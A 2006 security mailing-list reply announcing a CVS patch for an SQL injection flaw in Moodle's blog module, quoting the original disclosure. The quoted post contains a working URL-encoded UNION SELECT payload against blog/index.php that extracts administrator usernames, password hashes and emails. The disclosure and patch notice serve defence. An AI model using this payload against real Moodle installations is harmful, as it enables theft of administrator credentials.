Re: [Full-disclosure] SQL injection - moodle

To: disfigure <disfigure@xxxxxxxxx>
Subject: Re: [Full-disclosure] SQL injection - moodle
From: "scsantos@unigranrio com br" <scsantos@xxxxxxxxxxxxxxxxx>
Date: Mon, 09 Oct 2006 07:47:18 -0300
Cc: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
In-reply-to: <b47a94630610081429r51947788k3463a478a0b83115@xxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <b47a94630610081429r51947788k3463a478a0b83115@xxxxxxxxxxxxxx>
User-agent: Thunderbird 1.5.0.7 (X11/20060909)

A security vulnerability was recently discovered in all versions of
Moodle 1.6 and later that allows SQL injection. A quick one-line fix has
already been added to CVS to patch this problem for 1.6.x and 1.7 versions.

Update your servers using CVS as soon as possible, or edit the file
blog/index.php in your copy manually as described here:

    http://cvs.moodle.com/blog/index.php?r1=1.18.2.2&r2=1.18.2.3

Att,

Silvio Cesar L. dos Santos
Analista de Redes Pleno
DTI - Divisão de Tecnologia da Informação
UNIGRANRIO - Universidade do Grande Rio
+55 21 2672-7720
silviocesar@xxxxxxxxxxxxxxxxx
scsantos@xxxxxxxxxxxxxxxxx
http://www.unigranrio.br


disfigure wrote:
> /****************************************/
> http://www.w4cking.com
> 
> Product:
> moodle 1.6.2
> http://www.moodle.org
> 
> Vulnerability:
> SQL injection
> 
> Notes:
> - SQL injection can be used to obtain password hash
> - the moodle blog "module" must be enabled
> - guest access to the blog must be enabled
> 
> POC:
> <target>/blog/index.php?tag=x%2527%20UNION%20SELECT%20%2527-1%20UNION%20SELECT%201,1,1,1,1,1,1,username,password,1,1,1,1,1,1,1,username,password,email%20FROM%20mdl_user%20RIGHT%20JOIN%20mdl_user_admins%20ON%20mdl_user.id%3dmdl_user_admins.userid%20UNION%20SELECT%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20FROM%20mdl_post%20p,%20mdl_blog_tag_instance%20bt,%20mdl_user%20u%20WHERE%201%3D0%2527,1,1,%25271
> 
> 
> Original advisory (requires registration):
> http://w4ck1ng.com/board/showthread.php?t=1305
> /****************************************/
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

References:
- SQL injection - moodle
  - From: disfigure

Prev by Date: Cisco Security Advisory: Limitations in Cisco Secure Desktop
Next by Date: [ECHO_ADV_52$2006]OpenDock Easy Gallery <=1.4 (doc_directory) Multiple Remote File Inclusion Vulnerability
Previous by thread: SQL injection - moodle
Next by thread: PHP open_basedir with symlink() function Race Condition PoC exploit
Index(es):
- Date
- Thread